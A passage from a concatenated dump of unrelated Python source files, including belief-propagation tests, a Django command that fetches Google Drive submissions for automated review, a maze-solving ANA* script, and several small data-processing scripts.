switches\nlink_fails = {}\n\nwith open('network.cfg', 'r') as f:\n\tnum_switches = f.readline()\n\tfor line in f:\n\t\ttopology.append(line.strip().split(' '))\n\nswitch_cnt = int(num_switches)\n\nfor i in range(switch_cnt):\n neighbours[i+1] = []\n\nfor row in topology:\n neighbours[int(row[0])].append(int(row[1]))\n neighbours[int(row[1])].append(int(row[0]))\n\n\n\n\n\n#for i in range(int(num_switches)):\n# print str(i+1) + \": \" + str(neighbours[i+1])\n","sub_path":"topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"72878282","text":"class Pizza:\n def __init__(self, radius, toppings, slices=8):\n self.radius = radius\n self.toppings = toppings\n self.slices_left = slices\n\n def eat_slice(self):\n if self.slices_left > 0:\n self.slices_left -= 1\n else:\n print(\"Oh no! Out of pizaa\")\n\n def __repr__(self):\n return '{}\" pizza'.format(self.radius)\n\np = Pizza(14, (\"Pepperoni\", \"Olives\"), slices=12) \nprint(Pizza.eat_slice) # => \n\nprint(p.eat_slice) # => \n\nmethod = p.eat_slice\nprint(method.__self__) # => 14\" Pizza\nprint(method.__func__) # => \n\np.eat_slice() # Implicitly calls Pizza.eat_slice(p)","sub_path":"Lecture05/Exercises/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651563387","text":"\"\"\"Tests of integration of image loading, learning, and inference\"\"\"\nfrom mrftools import *\nimport numpy as np\nimport unittest\nimport os\nimport matplotlib.pyplot as plt\nimport copy\n\n\nclass TestIntegration(unittest.TestCase):\n \"\"\"Test class to test interface between image loading, learning, and inference\"\"\"\n def test_loading_and_learning(self):\n \"\"\"Test loading of a full image-segmentation training set, learning, and inference.\"\"\"\n loader = ImageLoader(10, 10)\n\n images, models, labels, names = loader.load_all_images_and_labels(os.path.join(os.path.dirname(__file__),\n 'train_data'), 2, 3)\n\n learner = Learner(MatrixBeliefPropagator)\n\n learner.set_regularization(0.0, 0.00001)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n weights = np.zeros(d_unary * num_states + d_edge * num_states**2)\n\n args = {'max_iter': 200}\n\n new_weights = learner.learn(weights, opt_args=args)\n\n unary_mat = new_weights[:d_unary * num_states].reshape((d_unary, num_states))\n pair_mat = new_weights[d_unary * num_states:].reshape((d_edge, num_states**2))\n print(\"Unary weights:\\n\" + repr(unary_mat))\n print(\"Pairwise weights:\\n\" + repr(pair_mat))\n\n # test inference with weights\n\n i = 1\n\n models[i].set_weights(new_weights)\n bp = MatrixBeliefPropagator(models[i])\n bp.infer(display='final')\n bp.load_beliefs()\n\n beliefs = np.zeros((images[i].height, images[i].width))\n label_img = np.zeros((images[i].height, images[i].width))\n errors = 0\n baseline = 0\n\n for x in range(images[i].width):\n for y in range(images[i].height):\n beliefs[y, x] = np.exp(bp.var_beliefs[(x, y)][1])\n label_img[y, x] = labels[i][(x, y)]\n errors += np.abs(labels[i][(x, y)] - np.round(beliefs[y, x]))\n baseline += labels[i][(x, y)]\n\n # # uncomment this to plot the beliefs\n # plt.subplot(131)\n # plt.imshow(images[i], interpolation=\"nearest\")\n # plt.subplot(132)\n # plt.imshow(label_img, interpolation=\"nearest\")\n # plt.subplot(133)\n # plt.imshow(beliefs, interpolation=\"nearest\")\n # plt.show()\n\n print(\"Error rate: %f\" % np.true_divide(errors, images[i].width * images[i].height))\n print(\"Baseline from guessing all background: %f\" % np.true_divide(baseline, images[i].width * images[i].height))\n assert errors < baseline, \"Learned model did no better than guessing all background.\"\n\n def test_consistency(self):\n \"\"\"Test consistency and correctness of inference on an image-segmentation MRF\"\"\"\n loader = ImageLoader(1, 4)\n np.random.seed(0)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 1)\n i = 0\n\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n new_weights = 0.1 * np.random.randn(d_unary * num_states + d_edge * num_states ** 2)\n\n models[i].set_weights(new_weights)\n models[i].load_factors_from_matrices()\n\n for inference_type in [BeliefPropagator, MatrixBeliefPropagator]:\n\n bp = inference_type(models[i])\n bp.infer(display='full')\n bp.load_beliefs()\n\n bf = BruteForce(models[i])\n\n # check unary marginal agreement with brute force\n for var in sorted(bp.mn.variables):\n unary_belief = np.exp(bp.var_beliefs[var])\n assert np.allclose(np.sum(unary_belief), 1.0), \"Unary belief not normalized\"\n unary_error = np.sum(np.abs(bf.unary_marginal(var) - unary_belief))\n print(\"Unary marginal for %s. Error compared to brute force: %e\" % (repr(var), unary_error))\n assert unary_error < 1e-3, \"Unary error was too large compared to brute force\"\n\n # check pairwise marginal agreement with brute force\n for var in sorted(bp.mn.variables):\n for neighbor in sorted(bp.mn.get_neighbors(var)):\n edge_error = np.sum(\n np.abs(bf.pairwise_marginal(var, neighbor) - np.exp(bp.pair_beliefs[(var, neighbor)])))\n print(\"Pair %s marginal error compared to brute force: %e\" % (repr((var, neighbor)), edge_error))\n assert edge_error < 1e-3, \"Pairwise error was too large compared to brute force\"\n\n # check consistency\n for var in sorted(bp.mn.variables):\n unary_belief = np.exp(bp.var_beliefs[var])\n\n for neighbor in sorted(bp.mn.get_neighbors(var)):\n pair_belief = np.sum(np.exp(bp.pair_beliefs[(var, neighbor)]), 1)\n assert np.allclose(np.sum(pair_belief), 1.0), \"Pair belief not normalized\"\n\n print(pair_belief, unary_belief)\n assert np.allclose(pair_belief, unary_belief), \"unary and pairwise beliefs are inconsistent\"\n\n print(\"Finished and passed tests for \" + repr(inference_type))\n\n def test_belief_propagators(self):\n \"\"\"Compare belief propagator implementations on image-segmentation MRFs\"\"\"\n loader = ImageLoader(4, 4)\n np.random.seed(0)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 1)\n i = 0\n\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n new_weights = 0.1 * np.random.randn(d_unary * num_states + d_edge * num_states ** 2)\n\n models[i].set_weights(new_weights)\n models[i].load_factors_from_matrices()\n\n model = models[i]\n\n bp = BeliefPropagator(model)\n bp.load_beliefs()\n\n mat_bp = MatrixBeliefPropagator(model)\n mat_bp.load_beliefs()\n\n for i in range(4):\n for var in sorted(bp.mn.variables):\n for neighbor in sorted(bp.mn.get_neighbors(var)):\n edge = (var, neighbor)\n bp_message = bp.messages[edge]\n\n if edge in mat_bp.mn.message_index:\n edge_index = mat_bp.mn.message_index[edge]\n else:\n edge_index = mat_bp.mn.message_index[(edge[1], edge[0])] + mat_bp.mn.num_edges\n\n mat_bp_message = mat_bp.message_mat[:, edge_index].ravel()\n\n assert np.allclose(bp_message, mat_bp_message), \\\n \"BP and matBP did not agree on message for edge %s in iter %d\" % (repr(edge), i) \\\n + \"\\nBP: \" + repr(bp_message) + \"\\nmatBP: \" + repr(mat_bp_message)\n\n # print \"Message %s is OK\" % repr(edge)\n\n assert np.allclose(bp.pair_beliefs[edge], mat_bp.pair_beliefs[edge]), \\\n \"BP and matBP did not agree on pair beliefs after %d message updates\" % i\n\n assert np.allclose(bp.var_beliefs[var], mat_bp.var_beliefs[var]), \\\n \"BP and matBP did not agree on unary beliefs after %d message updates\" % i\n\n bp.update_messages()\n bp.load_beliefs()\n mat_bp.update_messages()\n mat_bp.load_beliefs()\n\n def test_dual_learner_speed(self):\n \"\"\"Test the speed of inner-dual learner against primal learner\"\"\"\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n weights = np.zeros(d_unary * num_states + d_edge * num_states ** 2)\n\n loader = ImageLoader(10, 10)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 3)\n\n learner = Learner(MatrixBeliefPropagator)\n\n learner.set_regularization(0.0, 1.0)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n\n args = {'max_iter': 100}\n\n start = time.time()\n subgrad_weights = learner.learn(weights, optimizer=ada_grad, opt_args=args)\n subgrad_time = time.time() - start\n print(\"Learner took %f seconds\" % subgrad_time)\n\n learner = PairedDual(MatrixBeliefPropagator)\n learner.set_regularization(0.0, 1.0)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n\n args = {'max_iter': 500}\n\n start = time.time()\n paired_weights = learner.learn(weights, optimizer=ada_grad, opt_args=args)\n pd_time = time.time() - start\n print(\"PD took %f seconds\" % pd_time)\n\n assert pd_time < subgrad_time, \"Paired dual learning took longer than subgradient\"\n\n print(learner.subgrad_obj(subgrad_weights), learner.subgrad_obj(paired_weights))\n\n assert learner.subgrad_obj(subgrad_weights) >= learner.subgrad_obj(paired_weights), \\\n \"subgrad reached lower minimum than paired dual\"\n\n def test_optimizer(self):\n \"\"\"Test that, once the optimizer outputs and optimum, that it does not find a better optimum on a second call\"\"\"\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n learner_type = PairedDual\n inference_type = MatrixBeliefPropagator\n\n weights = np.zeros(d_unary * num_states + d_edge * num_states ** 2)\n\n image_size = 6\n\n loader = ImageLoader(image_size, image_size)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 2)\n\n # make latent variable\n\n for label in labels:\n # print \"Number of labels: %d\" % len(label)\n for x in range(int(image_size / 2)):\n for y in range(int(image_size / 2)):\n del label[(x, y)]\n # print \"Number of labels after removing quadrant: %d\" % len(label)\n\n learner = learner_type(inference_type)\n learner.set_regularization(0.0, 1.0)\n\n eval_learner = learner_type(inference_type)\n eval_learner.set_regularization(0.0, 1.0)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n eval_learner.add_data(states.copy(), copy.copy(model))\n\n objectives = []\n\n op = ObjectivePlotter(eval_learner.subgrad_obj, eval_learner.subgrad_grad)\n # op = ObjectivePlotter(learner.dual_obj, eval_learner.subgrad_grad)\n\n for i in range(4):\n prev_weights = weights\n start = time.time()\n\n weights = learner.learn(prev_weights, callback=op.callback)\n subgrad_time = time.time() - start\n print(\"Learner took %f seconds\" % subgrad_time)\n\n objectives.append(learner.subgrad_obj(weights))\n\n print(\"After i %d of optimization, objective was %e.\" % (i, objectives[i]))\n\n for i in range(len(objectives) - 1):\n assert objectives[i] - objectives[i + 1] < 1e-2, \\\n \"Optimizer improved after supposedly reaching optimum\"\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":11260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423758362","text":"from django.core.management.base import BaseCommand\n\nfrom curriculum_tracking.models import AgileCard, ContentItem, RecruitProjectReview\nfrom curriculum_tracking.constants import RED_FLAG, NOT_YET_COMPETENT, COMPETENT\nfrom taggit.models import Tag\nfrom core.models import User\nfrom django.utils import timezone\n\nfrom googleapiclient.discovery import build\nfrom google_helpers.utils import authorize_creds\nfrom googleapiclient.http import MediaIoBaseDownload\nfrom googleapiclient.errors import HttpError\nimport json\nimport re\nfrom pathlib import Path\n\nDESTINATION = Path(\"gitignore/ncit_downloads\")\nTODAY = timezone.now().date().strftime(\"%a %d %b %Y\")\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n self.bot_user, _ = User.objects.get_or_create(email=\"reviewbot@noreply.org\")\n ncit_tag = Tag.objects.get(name=\"ncit\")\n all_cards = AgileCard.objects.filter(content_item__tags__in=[ncit_tag]).filter(\n content_item__content_type=ContentItem.PROJECT\n )\n\n cards_in_review = all_cards.filter(status=AgileCard.IN_REVIEW)\n for card in cards_in_review:\n url = card.recruit_project.link_submission\n if url:\n if url.startswith(\"https://drive.google.com/\"):\n self.sync_card_link(card)\n else:\n self.add_review(\n card,\n NOT_YET_COMPETENT,\n \"Please follow the submission instructions exactly: Upload the document to google drive and submit a link. Do not submit other kinds of links. The url should start with https://drive.google.com/\",\n )\n else:\n self.add_review(\n card,\n RED_FLAG,\n \"Please submit a link to your work before asking for a review. Make sure your work is publically accessable so it can be reviewed\",\n )\n\n def sync_card_link(self, card):\n user: User = card.assignees.first()\n link = card.recruit_project.link_submission\n print(f\"processing link:\\n\\t{link}\")\n\n credentials = authorize_creds()\n service = build(\"drive\", \"v3\", credentials=credentials)\n\n found = re.search(\"https://drive.google.com/file/d/(.*)/\", link)\n if found:\n file_id = found.groups()[0]\n else:\n self.add_review(\n card,\n RED_FLAG,\n \"This link is not valid. Please link to a specific file in your google drive. The link should look like this: https://drive.google.com/file/d/SOME_WEIRD_STUFF/...\",\n )\n return\n\n try:\n metadata = service.files().get(fileId=file_id).execute()\n except HttpError as e:\n if json.loads(e.content)[\"error\"][\"code\"] == 404:\n\n self.add_review(\n card,\n RED_FLAG,\n \"This link is not accessable. Please make sure it points to something that exists. The file needs to be publically accessable so that it can be reviewed. Try opening your own link in an incognito window, it should work\",\n )\n return\n extension = metadata[\"name\"].split(\".\")[-1]\n if extension not in [\"docx\"]:\n breakpoint()\n\n filename = f\"{user.last_name} {user.first_name} [{user.id}] {card.content_item.title} {TODAY}.{extension}\"\n request = service.files().get_media(fileId=file_id)\n\n with open(DESTINATION / filename, \"wb\") as fh:\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n # print(\"Download %d%%.\" % int(status.progress() * 100))\n\n has_review = (\n card.recruit_project.project_reviews.filter(\n timestamp__gt=card.recruit_project.review_request_time\n )\n .filter(reviewer_user=self.bot_user)\n .count()\n )\n\n if not has_review:\n # breakpoint()\n self.add_review(\n card,\n COMPETENT,\n \"The link works. This project is ready for assessment\",\n )\n\n def add_review(self, card, status, comments):\n review = RecruitProjectReview.objects.create(\n status=status,\n timestamp=timezone.now(),\n comments=comments,\n recruit_project=card.recruit_project,\n reviewer_user=self.bot_user,\n )\n\n\n# url = (\n# \"https://drive.google.com/file/d/1MWkJNh8uyhIUe4PteNohH1HYuocRiE5Q/view?usp=sharing\"\n# )\n# file_id = \"1MWkJNh8uyhIUe4PteNohH1HYuocRiE5Q\"\n\n\n# url = \"https://drive.google.com/file/d/1-Tqi3WZKwu8H3fK2AVJ9gvc8e0a0czOC/view\" # ok\n# file_id = \"1-Tqi3WZKwu8H3fK2AVJ9gvc8e0a0czOC\"\n\n\n# request = service.files().get_media(fileId=file_id)\n\n\n# with open(\"gitignore/temp2.docx\", \"wb\") as fh:\n# downloader = MediaIoBaseDownload(fh, request)\n# done = False\n# while done is False:\n# try:\n# status, done = downloader.next_chunk()\n# except HttpError as e:\n# # error['e'] = e\n# done = True\n# print(json.loads(e.content)[\"error\"][\"code\"] == 404)\n# else:\n# print(\"Download %d%%.\" % int(status.progress() * 100))\n","sub_path":"backend/curriculum_tracking/management/commands/sync_nqf_files.py","file_name":"sync_nqf_files.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177177330","text":"import re\nimport sys\nimport os\nimport numpy as np\n\nsys.path.append('../')\nimport fragility\nfrom fragility.execute.singlecore.singlepert import SinglePert\n\n\nif __name__ == '__main__':\n # extract passed in variable\n iwin = int(sys.argv[1]) - 1\n patient = str(sys.argv[2]).lower()\n winsize = int(sys.argv[3])\n stepsize = int(sys.argv[4])\n radius = float(sys.argv[5])\n perturbtype = 'C'\n\n datadir = str(sys.argv[6])\n tempdatadir = str(sys.argv[7])\n datafile = str(sys.argv[8])\n\n # output file names \n outputdir = os.path.join(tempdatadir)\n \n if not os.path.exists(outputdir):\n os.makedirs(outputdir)\n outputfilename = os.path.join(\n outputdir, patient + '_' + str(iwin) + '.npz')\n metafilename = os.path.join(outputdir, '_meta' + patient)\n\n # rawdatafile and processed data files\n adjmatsfile = os.path.join(datadir, datafile, patient + '_mvarmodel.npz')\n\n sys.stdout.write(\"Inside file for pert model.\")\n\n # load adjacency matrices\n adjmats_data = np.load(adjmatsfile)\n adjmats = adjmats_data['adjmats']\n metadata = adjmats_data['metadata'].item()\n # includedchans = metadata['includedchans']\n timepoints = metadata['timepoints']\n chanlabels = metadata['chanlabels']\n\n sys.stdout.write('Loaded mvar model at ' + str(iwin))\n\n ############## RUN MODEL(S) ###############\n # initialize the perturbation model for testing\n perturbmodel = SinglePert(radius, perturbtype)\n # run perturbation model on this windowed A matrix\n pert_dict = perturbmodel.runpertsingle(\n adjmats[iwin, :, :], iwin=iwin, fast=True)\n pertmat = pert_dict['pertmat']\n delvecs = pert_dict['delvecs']\n # delfreqs = perturbation_dict['minfreqs']\n\n # save the output for this window\n if iwin == 0:\n # save the timepoints, included channels used, parameters\n np.savez(metafilename, timepoints=timepoints,\n winsize=winsize,\n stepsize=stepsize,\n # includedchans=includedchans,\n radius=radius,\n chanlabels=chanlabels)\n sys.stdout.write('Saved meta data for %s' % patient)\n\n # save adjacency matrix\n np.savez(outputfilename, pertmat=pertmat, delvecs=delvecs)\n sys.stdout.write('Saved core pert model %s\\n' % str(iwin))\n","sub_path":"__old/bin_tngpipeline/slurm_fragility/gnu/gnu_run_pertmodel.py","file_name":"gnu_run_pertmodel.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"587220377","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\n# 2 days offset. It starts by the second line (first repeated patient entry)\nlines = [{'day':'0', 'quests':[0, 1, 2]}, # linha 0\n {'day':'1', 'quests':[0, 2]}, # linha 1\n {'day':'2', 'quests':[0, 2]}, # linha 2\n {'day':'3', 'quests':[0, 2]}, # linha 3\n {'day':'4', 'quests':[0, 2]}, # linha 4\n {'day':'5', 'quests':[0, 2]}, # linha 5\n {'day':'6', 'quests':[0, 2, 3]}, # linha 6\n {'day':'7', 'quests':[0, 2]}, # linha 7\n {'day':'8', 'quests':[0, 2]}, # linha 8\n {'day':'9', 'quests':[0, 2]}, # linha 9\n {'day':'10', 'quests':[0, 2]}, # linha 10\n {'day':'11', 'quests':[0, 2]}, # linha 11\n {'day':'12', 'quests':[0, 2]}, # linha 12\n {'day':'13', 'quests':[0, 2]}, # linha 13\n {'day':'14', 'quests':[0, 2]}, # linha 14\n {'day':'15', 'quests':[0, 2]}, # linha 15\n {'day':'16', 'quests':[0, 2]}, # linha 16\n {'day':'17', 'quests':[0, 2]}, # linha 17\n {'day':'20', 'quests':[0, 2]}, # linha 18\n {'day':'23', 'quests':[0, 2]}, # linha 19\n {'day':'26', 'quests':[0, 2]}, # linha 20\n {'day':'29', 'quests':[0, 2]}, # linha 21\n {'day':'30', 'quests':[0, 2]}, # linha 22\n {'day':'30', 'quests':[]}, # linha 23 (pós)\n] \n\n# List of questionaries, the destiny has to be filled individually for each line\nquests = [{'short':'adcl', 'desc':'Avaliação diária, clínica e laboratorial', 'start_or':0, 'end_or':0,\n 'start_loc':'data_da_avalia_o', 'end_loc':'avaliao_diria_clnica_e_laboratorial_complete'}, # quest 0\n {'short':'adip', 'desc':'Avaliação diária de imagem pulmonar', 'start_or':0, 'end_or':0,\n 'start_loc':'data_tomo', 'end_loc':'avaliao_diria_de_imagem_pulmonar_complete'}, # quest 1\n {'short':'adpvgf', 'desc':'Avaliação diária de parâmetros ventilatórios, gasométricos e funcionais', 'start_or':0, 'end_or':0,\n 'start_loc':'data_da_avalia_o_2', 'end_loc':'avaliao_diria_de_parmetros_ventilatrios_gasomtrico_complete'}, # quest 2\n {'short':'ade', 'desc':'Avaliação diária de eletrocardiograma', 'start_or':0, 'end_or':0,\n 'start_loc':'data_eletro', 'end_loc':'avaliao_de_eletrocardiograma_complete'}, # quest 3\n]\n\n\n\n# Questionaries from last line of each entry, origin and destiny columns are the same\npost = [{'desc':'Todos', 'start':0, 'end':0,\n 'start_loc':'teste_cov_2', 'end_loc':'desfecho_da_uti_complete'}] # pos uti\n\n# Create dataframe and column list\ndf = pd.read_csv('input.csv')\ncols = df.columns.tolist()\n\n# translate col names for col indexes (indexes can vary per quetionaries, names don't)\nfor q in quests:\n q['start_or'] = df.columns.get_loc(q['start_loc']);\n q['end_or'] = df.columns.get_loc(q['end_loc']);\n# translate col names for col indexes\nfor p in post:\n p['start'] = df.columns.get_loc(p['start_loc']);\n p['end'] = df.columns.get_loc(p['end_loc']);\n\nnames = []\n# For each possible line, for each questionary the current line can have, make new columns for all columns this questionary has, with the day in the column label\nfor l in range(2, len(lines)): # from day 2 to last (there's no day 0 and day 1 stays in place)\n for q in lines[l]['quests']: # for all questionaries in that line that need new columns\n for c in range(quests[q]['start_or'], quests[q]['end_or'] + 1): # for all columns from the questionary q\n name = quests[q]['short'] + ' ' + cols[c] + ' ' + 'dia ' + lines[l]['day']\n names.append(name)\n\n# concatenate all newly created columns with the original dataframe in a new dataframe\nnew = pd.concat([df, pd.DataFrame(columns=list(names))], sort=False)\n\n# assigns values for first entry so it can skip the \"previous post icu\" if\norig = 0\nlin = 1\n# foreach row, if different patient, keep his index. If same patient, copy the daily values to their newly assigned column\ndup = df[cols[0]].duplicated() # says if each row is a duplicate or not\nfor count in new.index.values[1:].tolist(): # removes first patient so it doesn't fill previous entry's post columns\n if (dup[count] == False): # if new patient (not duplicate)\n # fill all post\n for p in post:\n for c in range(p['start'], p['end'] + 1):\n new.iloc[orig, c] = new.iloc[count - 1, c]\n # unable to drop repeated rows here withou messing with future indexes, dropping after all loops\n # new = new.drop(range(orig + 1, count)); # if orig + 1 and count are the same, it doesn't drop anyone\n orig = count # keep index\n lin = 1 # keep lines index aka first line of this entry\n else: # if same patient\n lin += 1 # increment the line index\n for q in lines[lin]['quests']: # for all quests that line lin can have\n start_d = new.columns.get_loc(quests[q]['short'] + ' ' + cols[quests[q]['start_or']] + ' ' + 'dia ' + lines[lin]['day'])\n end_d = new.columns.get_loc(quests[q]['short'] + ' ' + cols[quests[q]['end_or']] + ' ' + 'dia ' + lines[lin]['day'])\n # data goes to correct columns, acording to the day, counted by lin\n aux = quests[q]['start_or'] # aux keeps the origin indexes\n for c in range(start_d, end_d + 1): # c keeps the destiny indexes\n new.iloc[orig, c] = new.iloc[count, aux]\n aux += 1\n\n# Checks duplicity in the first column, Keeps first entry\nnew = new.drop_duplicates(subset=[cols[0]])\n# to export as csv\n# new.to_csv('out.csv', index=False)\n# pip install openpyxl \nnew.to_excel(\"output.xlsx\", sheet_name='Sheet_1', index=False)\n\n# -- NOT USED --\n# \n# Currently generating all new columns\n# # Append all new daily columns, for all days\n# con = pd.read_csv('concat.csv')\n# final = pd.concat([df, con], sort=False)\n\n# Doing all at once since it's all in sequence and have destiny == origin\n# # Questionaries that won't need new columns, origin and destiny columns are the same\n# post = [{'desc':'Outros testes patogênicos', 'start':210, 'end':289}, # pos uti 0\n# {'desc':'Complicações', 'start':290, 'end':318}, # pos uti 1\n# {'desc':'Tratamentos', 'start':319, 'end':370}, # pos uti 2\n# {'desc':'Desfecho da UTI', 'start':371, 'end':385}, # pos uti 3\n# ]\n","sub_path":"rows_to_cols.py","file_name":"rows_to_cols.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"69158313","text":"import requests\nimport shutil\n\ndef download_snapshot(url):\n local_filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n with open(local_filename, 'wb') as f:\n shutil.copyfileobj(r.raw, f)\n\n return local_filename\n\n\ndownload_snapshot(\"http://s3.kiva.org/snapshots/kiva_ds_csv.zip\")\n","sub_path":"kiva/scrape_test.py","file_name":"scrape_test.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"448431135","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 19 22:16:34 2019\r\n\r\n@author: Achyuthan\r\n\"\"\"\r\n\r\n# import libraries\r\nfrom sys import version_info\r\nif version_info.major == 2:\r\n # We are using Python 2.x\r\n from Tkinter import *\r\n import ttk\r\nelif version_info.major == 3:\r\n # We are using Python 3.x\r\n from tkinter import *\r\n from tkinter import ttk\r\nimport pdb\r\nimport time as t\r\nimport numpy as np\r\n\r\nopenlist=[] #Will contain the nodes that need to be opened\r\nG=1e15 #Cost to goal\r\nE=1e15 #The value that weights the heuristics\r\nsp=[] #records the shortest path\r\nmazelist=[] #takes all the information of the nodes of maze\r\n\r\n'''\r\nDefine the color scheme for visualization. You may change it but I recommend using the same colors\r\n'''\r\n# white (0) is an unvisited node, black(1) is a wall, blue(2) is a visited node\r\n# yellow(3) is for start node, green(4) is for exit node, red (5) is a node on the completed path\r\ncolors = {5: \"red\", 4: \"green\", 3: \"yellow\", 2: \"blue\", 1: \"black\", 0: \"white\"}\r\n\r\n\r\n'''\r\nOpens the maze file and creates tkinter GUI object\r\n'''\r\n# load maze\r\nwith open(\"easy.txt\") as text:#By default the easy maze is loaded. To explore the hard maze uncomment line 37 while commenting line 36\r\n#with open(\"hard.txt\") as text:\r\n maze = [list(line.strip()) for line in text]\r\n[col, row] = np.shape(maze)\r\n\r\n# create map\r\nroot = Tk()\r\nsize = 800 / row\r\ncanvas = Canvas(root, width=(size*row), height=(size*col))\r\nroot.title(\"ANA* Algorithm\")\r\n\r\n\r\ndef draw_canvas(canvas, maze):\r\n '''\r\nFunction to draw the grid and plot the solution\r\n '''\r\n for i in range(0, col):\r\n for j in range(0, row):\r\n canvas.create_rectangle(j*size, i*size, (j+1)*size, (i+1)*size, fill=colors[int(maze[i][j])])\r\n canvas.pack()\r\n\r\n\r\nclass node:\r\n def __init__(self, val, x, y):\r\n self.color = val #Saves the color of the node in maze\r\n self.x = x #\r\n self.y = y\r\n self.e = None\r\n self.f = None\r\n self.g = 1e15 # a very high value\r\n self.h = None # use Euclidean distance as heuristic\r\n self.parent = None\r\n \r\ndef heuristics(curr,goal):\r\n '''\r\n This function is to calculate the heuristics of the algorithm. In this case Euclidian distance was used\r\n '''\r\n h=((curr.x-goal.x)**2+(curr.y-goal.y)**2)**0.5\r\n return h\r\n\r\ndef Emax(openlist,G):\r\n '''\r\n This function returns the index of the maximum e(s) value to identify the node to be expanded in the ANA* methods\r\n '''\r\n eslist=[]\r\n for i in range (0,len(openlist)):\r\n eslist.append(openlist[i].e) #records all the e values in the form of a list\r\n s=np.argmax(eslist) #argmax returns the corresponding index value of the maximum e value\r\n return s\r\n\r\ndef Eval(G,g,h):\r\n '''\r\n This function is to find the e value of all nodes given G, g and h values\r\n '''\r\n e=(G-g)/(h + 1e-15) #the 1e-15 value is to avoid the 0 heuristic value associated with goal node\r\n return e\r\n\r\ndef successor(mazelist,s):\r\n '''\r\n This fucntion is to identify the children that will be expanded from the selected node from openlist\r\n '''\r\n children=[]\r\n for i in range (0,len(mazelist)):\r\n if i!=s:#This condition is to avoid considering the parent node as a child. The condition below is to satisfy the 4 neighbor for a parent node condition\r\n if (mazelist[i].x==(mazelist[s].x+1) or mazelist[i].x==(mazelist[s].x-1) or mazelist[i].x==mazelist[s].x):\r\n if mazelist[i].y==(mazelist[s].y+1) or mazelist[i].y==(mazelist[s].y-1) or mazelist[i].y==mazelist[s].y:\r\n if mazelist[i].color!=\"1\":#Checking for obstacle at node\r\n children.append(mazelist[i])\r\n return children\r\n\r\ndef locfinder(mazelist,x,y):\r\n '''\r\n Given the maze information and x and y values the corresponding index of the coordinates location will be returned by this function\r\n '''\r\n for i in range(0,len(mazelist)):\r\n if mazelist[i].x==x and mazelist[i].y==y:\r\n loc=i\r\n return loc\r\n\r\ndef improvesolution(goal):\r\n '''\r\n Given the goal this function will identify the path to goal.\r\n Repeated iterations of the function will send the algorithm towards optimal solution\r\n '''\r\n global G,openlist,E,mazelist\r\n while len(openlist)!=0:\r\n for i in range (0,len(openlist)):\r\n openlist[i].h=heuristics(openlist[i],goal)#define the huristics of all the nodes in the openlist\r\n openlist[i].e=Eval(G,openlist[i].g,openlist[i].h)#define the e value of all the nodes in the openlist\r\n s=Emax(openlist,G)#The maximum E value is in the location s and Snode is the corresponding node\r\n Snode=openlist[s]\r\n #print(\"gg\",openlist[s].x,\" \",openlist[s].y)\r\n del openlist[s]#the node with max e value is deleted as it is being expanded\r\n if Snode.e=G:\r\n j=openlist.pop(index) \r\n\r\n \r\n \r\n\r\n #-----------------------------------------------------------------------------------------------------------\r\n\r\n return\r\n\r\n\r\ndef main():\r\n t0=t.time()\r\n global mazelist,G,E,openlist\r\n '''\r\n Define start and goal node. You may change how to define the nodes.\r\n '''\r\n entrance_node = node(\"3\",row-1, 1)#The entrance node or start node\r\n exit_node =node(\"4\",0, col-2)#The exit node or goal\r\n\r\n\r\n # run the ana_star algorithm\r\n for i in range(0,row):#These two nested loops are to add all the information of the maze into the mazelist list of node objects\r\n for j in range (0,col):\r\n mazelist.append(node(maze[i][j],i,j))\r\n endit=locfinder(mazelist,exit_node.x,exit_node.y)#finding the location of goal nodes in mazelist\r\n mazelist[endit].color=\"4\"#setting the color greeen for the goal node\r\n ana_star(maze, entrance_node, exit_node)#Execute the algorithm\r\n i=0\r\n for j in range(0,row):#The two nested loops supply the color infromation from mazelist to maze post all the operations\r\n for k in range (0,col):\r\n maze[j][k]=mazelist[i].color\r\n i=i+1\r\n for k in range (0,len(sp)):#Members of the sp path are considered to be visited nodes and are painted blue\r\n for i in range(0,row):\r\n for j in range (0,col):\r\n if i==sp[k].x and j==sp[k].y:\r\n maze[i][j]=\"2\"\r\n finch=0\r\n totalc=0\r\n i=len(sp)-1\r\n while finch==0:#Here members of the last iteration or the final optimal solution are identified and the corresponding maze locations are painted red\r\n 